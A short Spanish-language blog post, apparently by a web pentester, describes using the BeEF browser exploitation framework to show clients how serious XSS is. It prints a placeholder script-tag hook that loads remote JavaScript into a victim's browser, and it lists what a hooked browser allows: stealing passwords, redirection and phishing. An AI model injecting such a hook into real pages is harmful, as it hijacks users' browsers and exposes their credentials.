Hace poco escribí un artículo donde les decía que muchos de los web pentest que hago tienen algun tipo de XSS.
Igual les decía que es una vulnerablidad muy dificil de explicar y que normalmente los clientes no le dan la importancia que deberían.
Ahora bien como podemos cambiar eso? La respuesta es BeEF (Browser Exploitation Framework.)
Como funciona?
Pues cuando lo enciendes te da un hook que puedes inyectar usando XSS (o cualquier otro método) y hace que secuestres el explorardor de la victima y puedas hacer cosas divertidas como extraer contraseñas, recopilar informacion, redireccionarlo, phising, etc. Por pasos cuando lo enciendes ves esto:
En esa pantalla hay dos cosas muy importantes el UI URL para entrar a la panel de administración y el Hook Url, que es el que usaras para secuestrar buscadores ja.
<script src='https://ip:port/hook.js'></script>
Cuando alguien esta en la página podemos ver información muy interesante y usar módulos (incluso usar metasploit!!!)
De los modulos, verdes son los probados y que el usuario no debe darse cuenta, el naranja es puede ser invisible, el gris es que no se ha probado y el rojo es el que no va a funcionar.
Si le muestras esto a los clientes y aun asi creen que no es una vulnerabilidad importante es que no tienen remedio.
En mi to-do list esta usarlo con mi piña o con el rubber ducky
